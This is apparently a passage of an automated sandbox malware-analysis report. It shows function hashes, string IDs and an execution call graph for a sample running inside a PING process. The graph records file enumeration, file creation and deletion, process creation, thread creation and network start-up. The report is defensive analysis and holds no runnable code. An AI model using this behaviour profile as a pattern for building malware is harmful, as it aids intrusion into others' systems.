                                          • Instruction ID: 365fa8c22631efebfeebc07627b3fec6bb78d2a9f190e3de5345fdb9cad24056
                                          • Opcode Fuzzy Hash: f0329bde49217cc22bcd13697bb86161c5062e143863b17806e91b92b4d1a959
                                          • Instruction Fuzzy Hash: E68153B2C012596ADB26EB94CD85FEFB37EEF8C700F0041DAE509A6140EB745B448FA5
                                          Function 0299D54D Relevance: 5.1, Strings: 4, Instructions: 127COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: )$USL$W$YvSr
                                          • API String ID: 0-3047499500
                                          • Opcode ID: 391130121bb57bdd1ccef213525b845b13e3c197475c44d89aaef3b8fcb4fe7c
                                          • Instruction ID: b635df6dca36a27e30808a96b04a7d8702708d6cc3d8af1935a1b60198a9682c
                                          • Opcode Fuzzy Hash: 391130121bb57bdd1ccef213525b845b13e3c197475c44d89aaef3b8fcb4fe7c
                                          • Instruction Fuzzy Hash: F031AC3220968A9BDB02DE2CEC816D6BBB4EF5333472442DDD49C8B183D722550AC7A6
                                          Function 029A6CF5 Relevance: 5.1, Strings: 4, Instructions: 122COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                          • API String ID: 0-2877786613
                                          • Opcode ID: 3de7f5ece88876975a61a1db6d4121f1e79dad4833f6588baa37e1f65fa6d5c0
                                          • Instruction ID: ca37d5dfffcd5174bc95d23ce1bd94be436f3cdb6fea7953a576ad169ffceeab
                                          • Opcode Fuzzy Hash: 3de7f5ece88876975a61a1db6d4121f1e79dad4833f6588baa37e1f65fa6d5c0
                                          • Instruction Fuzzy Hash: 75410C719512187BEB12EBA4CD42FEF7B7EAF99700F004148FA047B181E7B46645CBA6
                                          Function 029A6CF6 Relevance: 5.1, Strings: 4, Instructions: 120COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                          • API String ID: 0-2877786613
                                          • Opcode ID: e57907dab2015163c50ddf64d1d0a347a7fee58b3cf82d65ec294b472de3d253
                                          • Instruction ID: 4de5c919f8ec0afbb100bc99f43aa63c0b0085728fbb60ca4b4aedf1fc4db538
                                          • Opcode Fuzzy Hash: e57907dab2015163c50ddf64d1d0a347a7fee58b3cf82d65ec294b472de3d253
                                          • Instruction Fuzzy Hash: D8311D719512187BEB12EBA4CD42FEF777EAF99700F004148FA047B181E7B46A45CBA6
                                          Function 029A2FB6 Relevance: 5.1, Strings: 4, Instructions: 89COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: 2$L$Z$i
                                          • API String ID: 0-676540984
                                          • Opcode ID: 2d5a5e8216fd6ade59bff6597cfd0c4a4bb1c4881acf1012deb05cb36ca0be97
                                          • Instruction ID: 42c5fc3870b638419ccc003bd9f883b8e4eab7bdec27d1f1167ca89949ed55f1
                                          • Opcode Fuzzy Hash: 2d5a5e8216fd6ade59bff6597cfd0c4a4bb1c4881acf1012deb05cb36ca0be97
                                          • Instruction Fuzzy Hash: FC3132B1E10219BBEB05DBA4CE41FFE77BDEF48304F004198E908A7240E775AA058BE5
                                          Function 02990D0E Relevance: 5.0, Strings: 4, Instructions: 26COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: &$@JGR$@JGR$A\OV
                                          • API String ID: 0-1876648471
                                          • Opcode ID: 099a9d4e554c31ae57ed94eda2d13aa0a4333fbbb5018c2b1a15518d1480b627
                                          • Instruction ID: 3d57bb61cb56d801e131760f86fc03899c9423379d29d5ea838859e0c68b4426
                                          • Opcode Fuzzy Hash: 099a9d4e554c31ae57ed94eda2d13aa0a4333fbbb5018c2b1a15518d1480b627
                                          • Instruction Fuzzy Hash: 9DF0657180528CABCB00DFE8D941AEEFB75EF44204F54499DD965EB242D3719306DBD2

                                          Execution Graph

                                          Execution Coverage:2.3%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:1.7%
                                          Total number of Nodes:406
                                          Total number of Limit Nodes:62
                                          execution_graph 95986 4855c0 95991 487b30 95986->95991 95988 4855f0 95990 48561c 95988->95990 95995 487ab0 95988->95995 95992 487b43 95991->95992 96002 498350 95992->96002 95994 487b6e 95994->95988 95996 487af4 95995->95996 96001 487b15 95996->96001 96008 498120 95996->96008 95998 487b05 95999 487b21 95998->95999 96013 498e10 95998->96013 95999->95988 96001->95988 96003 4983d1 96002->96003 96004 49837e 96002->96004 96007 2c12dd0 LdrInitializeThunk 96003->96007 96004->95994 96005 4983f6 96005->95994 96007->96005 96009 49819d 96008->96009 96011 49814b 96008->96011 96016 2c14650 LdrInitializeThunk 96009->96016 96010 4981c2 96010->95998 96011->95998 96014 498e2a 96013->96014 96015 498e3b NtClose 96014->96015 96015->96001 96016->96010 96017 498400 96018 49841d 96017->96018 96021 2c12df0 LdrInitializeThunk 96018->96021 96019 498445 96021->96019 96022 498280 96023 49830f 96022->96023 96025 4982ab 96022->96025 96027 2c12ee0 LdrInitializeThunk 96023->96027 96024 498340 96027->96024 96028 498c80 96029 498d27 96028->96029 96031 498cab 96028->96031 96030 498d3d NtReadFile 96029->96030 96032 491540 96036 491559 96032->96036 96033 4915a4 96040 49aee0 96033->96040 96036->96033 96037 4915e7 96036->96037 96039 4915ec 96036->96039 96038 49aee0 RtlFreeHeap 96037->96038 96038->96039 96043 499180 96040->96043 96042 4915b4 96044 49919d 96043->96044 96045 4991ae RtlFreeHeap 96044->96045 96045->96042 96046 495b00 96047 495b5a 96046->96047 96049 495b67 96047->96049 96050 493500 96047->96050 96051 493541 96050->96051 96052 49364e 96051->96052 96056 483f50 96051->96056 96052->96049 96054 4935d0 Sleep 96055 493587 96054->96055 96055->96052 96055->96054 96058 483f74 96056->96058 96057 483f7b 96057->96055 96058->96057 96059 483fb0 LdrLoadDll 96058->96059 96060 483fc7 96058->96060 96059->96060 96060->96055 96061 488247 96062 48824a 96061->96062 96063 488201 96062->96063 96065 4869b0 LdrInitializeThunk LdrInitializeThunk 96062->96065 96065->96063 96066 2c12ad0 LdrInitializeThunk 96067 48965c 96068 489661 96067->96068 96069 48968d 96068->96069 96070 49aee0 RtlFreeHeap 96068->96070 96070->96069 96071 479c10 96072 479c1f 96071->96072 96073 479c5d 96072->96073 96074 479c4a CreateThread 96072->96074 96075 486e1f 96076 486da8 96075->96076 96078 486dc2 96076->96078 96079 48aca0 96076->96079 96080 48acc6 96079->96080 96081 48aef6 96080->96081 96106 499210 96080->96106 96081->96078 96083 48ad39 96083->96081 96109 49c1d0 96083->96109 96085 48ad58 96085->96081 96086 48ae2f 96085->96086 96115 498450 96085->96115 96088 485540 LdrInitializeThunk 96086->96088 96090 48ae4e 96086->96090 96088->96090 96095 48aede 96090->96095 96122 497fc0 96090->96122 96091 48ae17 96092 487b30 LdrInitializeThunk 96091->96092 96097 48ae25 96092->96097 96093 48adf5 96137 494210 LdrInitializeThunk 96093->96137 96094 48adc3 96094->96081 96094->96091 96094->96093 96119 485540 96094->96119 96098 487b30 LdrInitializeThunk 96095->96098 96097->96078 96102 48aeec 96098->96102 96101 48aeb5 96127 498070 96101->96127 96102->96078 96104 48aecf 96132 4981d0 96104->96132 96107 49922d 96106->96107 96108 49923e CreateProcessInternalW 96107->96108 96108->96083 96111 49c140 96109->96111 96110 49c19d 96110->96085 96111->96110 96138 49afc0 96111->96138 96113 49c17a 96114 49aee0 RtlFreeHeap 96113->96114 96114->96110 96116 49846a 96115->96116 96144 2c12c0a 96116->96144 96117 48adba 96117->96086 96117->96094 96147 498620 96119->96147 96121 48557e 96121->96093 96123 49803d 96122->96123 96125 497feb 96122->96125 96153 2c139b0 LdrInitializeThunk 96123->96153 96124 498062 96124->96101 96125->96101 96128 4980f0 96127->96128 96129 49809e 96127->96129 96154 2c14340 LdrInitializeThunk 96128->96154 96129->96104 96130 498115 96130->96104 96133 49824d 96132->96133 96135 4981fb 96132->96135 96155 2c12fb0 LdrInitializeThunk 96133->96155 96134 498272 96134->96095 96135->96095 96137->96091 96141 499130 96138->96141 96140 49afdb 96140->96113 96142 49914a 96141->96142 96143 49915b RtlAllocateHeap 96142->96143 96143->96140 96145 2c12c11 96144->96145 96146 2c12c1f LdrInitializeThunk 96144->96146 96145->96117 96146->96117 96148 4986d4 96147->96148 96150 498652 96147->96150 96152 2c12d10 LdrInitializeThunk 96148->96152 96149 498719 96149->96121 96150->96121 96152->96149 96153->96124 96154->96130 96155->96134 96156 48c010 96158 48c039 96156->96158 96157 48c13c 96158->96157 96159 48c0de FindFirstFileW 96158->96159 96159->96157 96161 48c0f9 96159->96161 96160 48c123 FindNextFileW 96160->96161 96162 48c135 FindClose 96160->96162 96161->96160 96162->96157 96163 481c90 96164 498450 LdrInitializeThunk 96163->96164 96165 481cc6 96164->96165 96166 486d50 96167 486dc2 96166->96167 96168 486d68 96166->96168 96168->96167 96169 48aca0 9 API calls 96168->96169 96169->96167 96170 480790 96171 4807aa 96170->96171 96172 483f50 LdrLoadDll 96171->96172 96173 4807c8 96172->96173 96174 48080d 96173->96174 96175 4807fc PostThreadMessageW 96173->96175 96175->96174 96176 498b10 96177 498b3f 96176->96177 96178 498bc7 96176->96178 96179 498bdd NtCreateFile 96178->96179 96180 482b13 96185 4877b0 96180->96185 96183 482b3f 96184 498e10 NtClose 96184->96183 96186 4877ca 96185->96186 96190 482b23 96185->96190 96191 4984f0 96186->96191 96189 498e10 NtClose 96189->96190 96190->96183 96190->96184 96192 49850a 96191->96192 96195 2c135c0 LdrInitializeThunk 96192->96195 96193 48789a 96193->96189 96195->96193 96196 482168 96197 482188 96196->96197 96200 485cd0 96197->96200 96199 482193 96201 485d03 96200->96201 96202 485d27 96201->96202 96207 498970 96201->96207 96202->96199 96204 498e10 NtClose 96206 485dca 96204->96206 96205 485d4a 96205->96202 96205->96204 96206->96199 96208 49898d 96207->96208 96211 2c12ca0 LdrInitializeThunk 96208->96211 96209 4989b9 96209->96205 96211->96209 96214 48f260 96215 48f2c4 96214->96215 96216 485cd0 2 API calls 96215->96216 96218 48f3f7 96216->96218 96217 48f3fe 96218->96217 96239 485de0 96218->96239 96220 48f5a3 96221 48f47a 96221->96220 96222 48f5b2 96221->96222 96243 48f040 96221->96243 96223 498e10 NtClose 96222->96223 96225 48f5bc 96223->96225 96226 48f4b6 96226->96222 96227 48f4c1 96226->96227 96228 49afc0 RtlAllocateHeap 96227->96228 96229 48f4ea 96228->96229 96230 48f509 96229->96230 96231 48f4f3 96229->96231 96252 48ef30 CoInitialize 96230->96252 96232 498e10 NtClose 96231->96232 96234 48f4fd 96232->96234 96235 498e10 NtClose 96236 48f59c 96235->96236 96237 49aee0 RtlFreeHeap 96236->96237 96237->96220 96238 48f517 96238->96235 96240 485e05 96239->96240 96254 498760 96240->96254 96244 48f05c 96243->96244 96245 483f50 LdrLoadDll 96244->96245 96247 48f07a 96245->96247 96246 48f083 96246->96226 96247->96246 96248 483f50 LdrLoadDll 96247->96248 96249 48f14e 96248->96249 96250 483f50 LdrLoadDll 96249->96250 96251 48f1ab 96249->96251 96250->96251 96251->96226 96253 48ef95 96252->96253 96253->96238 96255 49877a 96254->96255 96258 2c12c60 LdrInitializeThunk 96255->96258 96256 485e79 96256->96221 96258->96256 96259 48fb60 96260 48fb83 96259->96260 96261 483f50 LdrLoadDll 96260->96261 96262 48fba7 96261->96262 96263 4867a0 96264 4867ca 96263->96264 96267 487960 96264->96267 96266 4867f4 96268 48797d 96267->96268 96274 498540 96268->96274 96270 4879cd 96271 4879d4 96270->96271 96272 498620 LdrInitializeThunk 96270->96272 96271->96266 96273 4879fd 96272->96273 96273->96266 96275 4985de 96274->96275 96277 49856e 96274->96277 96279 2c12f30 LdrInitializeThunk 96275->96279 96276 498617 96276->96270 96277->96270 96279->96276 96290 479c70 96292 479de8 96290->96292 96293 479fd5 96292->96293 96294 49ab40 96292->96294 96295 49ab66 96294->96295 96300 474210 96295->96300 96297 49ab72 96298 49abab 96297->96298 96303 495090 96297->96303 96298->96293 96302 47421d 96300->96302 96307 482c10 96300->96307 96302->96297 96304 4950f2 96303->96304 96305 4950ff 96304->96305 96318 4813d0 96304->96318 96305->96298 96308 482c2d 96307->96308 96310 482c46 96308->96310 96311 499860 96308->96311 96310->96302 96313 49987a 96311->96313 96312 4998a9 96312->96310 96313->96312 96314 498450 LdrInitializeThunk 96313->96314 96315 499909 96314->96315 96316 49aee0 RtlFreeHeap 96315->96316 96317 499922 96316->96317 96317->96310 96319 48140b 96318->96319 96336 4878c0 96319->96336 96321 481413 96322 49afc0 RtlAllocateHeap 96321->96322 96335 4816ed 96321->96335 96323 481429 96322->96323 96324 49afc0 RtlAllocateHeap 96323->96324 96325 48143a 96324->96325 96326 49afc0 RtlAllocateHeap 96325->96326 96327 48144b 96326->96327 96329 4814e8 96327->96329 96351 486430 NtClose LdrInitializeThunk LdrInitializeThunk 96327->96351 96330 483f50 LdrLoadDll 96329->96330 96331 4816a2 96330->96331 96332 4816dc 96331->96332 96333 4816ce WSAStartup 96331->96333 96347 4979d0 96332->96347 96333->96332 96335->96305 96337 4878ec 96336->96337 96338 4877b0 2 API calls 96337->96338 96339 48790f 96338->96339 96340 487919 96339->96340 96341 487931 96339->96341 96342 487924 96340->96342 96343 498e10 NtClose 96340->96343 96344 498e10 NtClose 96341->96344 96345 48794d 96341->96345 96342->96321 96343->96342 96346 487943 96344->96346 96345->96321 96346->96321 96348 497a32 96347->96348 96350 497a3f 96348->96350 96352 481700 96348->96352 96350->96335 96351->96329 96357 481720 96352->96357 96366 487b90 96352->96366 96354 481c80 96354->96350 96356 48193a 96358 49c1d0 2 API calls 96356->96358 96357->96354 96370 49c0a0 96357->96370 96360 48194f 96358->96360 96359 487b30 LdrInitializeThunk 96362 48199c 96359->96362 96360->96362 96375 480210 96360->96375 96362->96354 96362->96359 96363 480210 LdrInitializeThunk 96362->96363 96363->96362 96364 481af0 96364->96362 96365 487b30 LdrInitializeThunk 96364->96365 96365->96364 96367 487b9d 96366->96367 96368 487bbb SetErrorMode 96367->96368 96369 487bc2 96367->96369 96368->96369 96369->96357 96371 49c0b0 96370->96371 96372 49c0b6 96370->96372 96371->96356 96373 49afc0 RtlAllocateHeap 96372->96373 96374 49c0dc 96373->96374 96374->96356 96376 480232 96375->96376 96378 4990a0 96375->96378 96376->96364 96379 4990bd 96378->96379 96382 2c12c70 LdrInitializeThunk 96379->96382 96380 4990e5 96380->96376 96382->96380 96383 48a770 96388 48a480 96383->96388 96385 48a77d 96400 48a100 96385->96400 96387 48a799 96389 48a4a5 96388->96389 96390 48a5f3 96389->96390 96410 492dd0 96389->96410 96390->96385 96392 48a60a 96392->96385 96393 48a601 96393->96392 96395 48a6f7 96393->96395 96425 489b50 96393->96425 96397 48a75a 96395->96397 96434 489ec0 96395->96434 96398 49aee0 RtlFreeHeap 96397->96398 96399 48a761 96398->96399 96399->96385 96401 48a116 96400->96401 96408 48a121 96400->96408 96402 49afc0 RtlAllocateHeap 96401->96402 96402->96408 96403 48a142 96403->96387 96404 48a452 96405 48a46b 96404->96405 96406 49aee0 RtlFreeHeap 96404->96406 96405->96387 96406->96405 96407 489b50 RtlFreeHeap 96407->96408 96408->96403 96408->96404 96408->96407 96409 489ec0 RtlFreeHeap 96408->96409 96409->96408 96411 492dde 96410->96411 96412 492de5 96410->96412 96411->96393 96413 483f50 LdrLoadDll 96412->96413 96414 492e1a 96413->96414 96415 492e29 96414->96415 96438 4928a0 LdrLoadDll 96414->96438 96417 49afc0 RtlAllocateHeap 96415->96417 96422 492fd7 96415->96422 96418 492e42 96417->96418 96419 492fcd 96418->96419 96420 492e5e 96418->96420 96418->96422 96421 49aee0 RtlFreeHeap 96419->96421 96419->96422 96420->96422 96423 49aee0 RtlFreeHeap 96420->96423 96421->96422 96422->96393 96424 492fc1 96423->96424 96424->96393 96426 489b76 96425->96426 96439 48d580 96426->96439 96428 489be8 96430 489d6a 96428->96430 96431 489c06 96428->96431 96429 489d4f 96429->96393 96430->96429 96433 489a10 RtlFreeHeap 96430->96433 96431->96429 96444 489a10 96431->96444 96433->96430 96435 489ee6 96434->96435 96436 48d580 RtlFreeHeap 96435->96436 96437 489f6d 96436->96437 96437->96395 96438->96415 96441 48d5a4 96439->96441 96440 48d5b1 96440->96428 96441->96440 96442 49aee0 RtlFreeHeap 96441->96442 96443 48d5f4 96442->96443 96443->96428 96445 489a2d 96444->96445 96448 48d610 96445->96448 96447 489b33 96447->96431 96450 48d634 96448->96450 96449 48d6de 96449->96447 96450->96449 96451 49aee0 RtlFreeHeap 96450->96451 96451->96449 96452 486b70 96453 486b8c 96452->96453 96456 486bdf 96452->96456 96455 498e10 NtClose 96453->96455 96453->96456 96454 486d17 96457 486ba7 96455->96457 96456->96454 96463 485f60 NtClose LdrInitializeThunk 96456->96463 96462 485f60 NtClose LdrInitializeThunk 96457->96462 96459 486cf1 96459->96454 96464 486130 NtClose LdrInitializeThunk LdrInitializeThunk 96459->96464 96462->96456 96463->96459 96464->96454 96465 498d70 96466 498d9b 96465->96466 96467 498de7 96465->96467 96468 498dfd NtDeleteFile 96467->96468 96469 4911b0 96470 4911cc 96469->96470 96471 491208 96470->96471 96472 4911f4 96470->96472 96474 498e10 NtClose 96471->96474 96473 498e10 NtClose 96472->96473 96475 4911fd 96473->96475 96476 491211 96474->96476 96479 49b000 RtlAllocateHeap 96476->96479 96478 49121c 96479->96478 96480 487db4 GetFileAttributesW 96481 487dd0 96480->96481

                                          Executed Functions

                                          Function 0048C010 Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileW.KERNELBASE(?,00000000), ref: 0048C0EF
                                          • FindNextFileW.KERNELBASE(?,00000010), ref: 0048C12E
                                          • FindClose.KERNELBASE(?), ref: 0048C139
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Offset: 00470000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_470000_PING.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$File$CloseFirstNext
                                          • String ID:
                                          • API String ID: 3541575487-0
                                          • Opcode ID: f6b26978481edb1ec95c328520aa3acea1865f064ce05863a5128591c11b86b7
                                          • Instruction ID: baa23416d17d22e0a76a52921fd74de139ee22aeddf6adf1e49c7db84e3f3b63
                                          • Opcode Fuzzy Hash: f6b26978481edb1ec95c328520aa3acea1865f064ce05863a5128591c11b86b7
                                          • Instruction Fuzzy Hash: AA319371900209BBDB20EF65CCC5FEF777C9F44748F14455DB908A7191DA78AA848BA4
                                          Function 00498B10 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00498C0E
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Offset: 00470000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_470000_PING.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: fef85b04ee69a5700c0ec76a1714389a2665d829943b313fdc5404dad2d27e0c
                                          • Instruction ID: 51c443a5238d8e02f85cecfaeea43c9d5089f5a45547d1b4cc38f246a36b2919
                                          • Opcode Fuzzy Hash: fef85b04ee69a5700c0ec76a1714389a2665d829943b313fdc5404dad2d27e0c
                                          • Instruction Fuzzy Hash: BD31D8B5A00248AFCB14DF99D841EDE77F9EF8D314F10821AF919A7344D734A851CBA5
                                          Function 00498C80 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 00498D66
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Offset: 00470000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_470000_PING.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: 0d086bee5c2b58c7e661bebb2a40db28e0c106d4341425c418c63458311d346f
                                          • Instruction ID: 020d28c4c893f4281da23f625270fdcab8a6eb4a22c3815ae9a396160baa885c
                                          • Opcode Fuzzy Hash: 0d086bee5c2b58c7e661bebb2a40db28e0c106d4341425c418c63458311d346f
                                          • Instruction Fuzzy Hash: BA31E8B5A00648AFCB14DF99D841EEFB7F9EF89314F10821AF919A7340D734A911CBA5
                                          Function 00498D70 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Offset: 00470000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_470000_PING.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteFile
                                          • String ID:
                                          • API String ID: 4033686569-0
                                          • Opcode ID: 5d2adfcf2adaea0a20616b4485d055f6d3b96e9d74a1ee4f38c285b142ad117c
                                          • Instruction ID: a6cd29b895770a429ea36c004a8603313cdfd082ab03bd2abf13553dd7edd78c
                                          • Opcode Fuzzy Hash: 5d2adfcf2adaea0a20616b4485d055f6d3b96e9d74a1ee4f38c285b142ad117c
                                          • Instruction Fuzzy Hash: 73119171600608AED620EB69CC01FEF77ACDF85318F00411EFA09A7281DA78691487E9
                                          Function 00498E10 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00498E44
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Offset: 00470000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_470000_PING.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: 087d854117f242ca877c517a827cee7a74cf93268eeac0a7a33afdcf45fba969
                                          • Instruction ID: 62d6d74ef32dc38e24398ee4c33332ca5464473e43fc74fb0ec2cefbbdc1ab10
                                          • Opcode Fuzzy Hash: 087d854117f242ca877c517a827cee7a74cf93268eeac0a7a33afdcf45fba969
                                          • Instruction Fuzzy Hash: ADE04F356002147BC620EB5ADC01FDB779CDBC5768F00841AFA18A7141CA71791087F4
                                          Function 02C14340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: true
                                          • Associated: 00000009.00000002.4571956387.0000000002CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.4571956387.0000000002CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_2ba0000_PING.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: e3b884d6f35c26adfa3b28fabe863be6997bdfba012a0890ca8c48f94fae087a
                                          • Instruction ID: e3c5ca7cb496e2397f1687cf648e2541fb1848715138fca801e3413bf4be399f
                                          • Opcode Fuzzy Hash: e3b884d6f35c26adfa3b28fabe863be6997bdfba012a0890ca8c48f94fae087a
                                          • Instruction Fuzzy Hash: 93900471745D1053D140715C4CC55474005D7F0701F55C111F0434554CCF14CF5F5371
                                          Function 02C14650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: true
                                          • Associated: 00000009.00000002.4571956387.0000000002CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.4571956387.0000000002CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_2ba0000_PING.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 64d83aa6deaf538172e9ef33c916db46ae33034196be986fd07b7d2c9211f6c9
                                          • Instruction ID: d2d4f1bdf1b5eda22783c214b1418854a8b5b474bac52852383501e27123f1ff
                                          • Opcode Fuzzy Hash: 64d83aa6deaf538172e9ef33c916db46ae33034196be986fd07b7d2c9211f6c9
                                          • Instruction Fuzzy Hash: 4C9002A164161082414071584805407600597E1701395C215A0554560C8E1889599279
                                          Function 02C12AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: true
                                          • Associated: 00000009.00000002.4571956387.0000000002CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.4571956387.0000000002CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_2ba0000_PING.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 7f05b6c945666a440a3a38e51c392ee79c5e2eaf317dae3bb5d97f049251ffcb
                                          • Instruction ID: dbe9d85d2140087ed15a1ddb08e2476d36e8df6b2d08b04b771a7ea3dc3d29bb
                                          • Opcode Fuzzy Hash: 7f05b6c945666a440a3a38e51c392ee79c5e2eaf317dae3bb5d97f049251ffcb
                                          • Instruction Fuzzy Hash: 29900475351510430105F55C07055070047C7D5751355C131F1015550CDF31CD755131
                                          Function 02C12AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: true
                                          • Associated: 00000009.00000002.4571956387.0000000002CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.4571956387.0000000002CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_2ba0000_PING.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 7896e67bb7dee1c0d635f8499ea204b5af869c0fa9e19be68793cb5db0d841af
                                          • Instruction ID: d102bbc5f3638ec4748597159d47a677feb3826629ff7a3ec702ad8c4386759a
                                          • Opcode Fuzzy Hash: 7896e67bb7dee1c0d635f8499ea204b5af869c0fa9e19be68793cb5db0d841af
                                          • Instruction Fuzzy Hash: 11900265261510420145B558060550B044597D6751395C115F1416590CCE2189695331
                                          Function 02C12B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: true
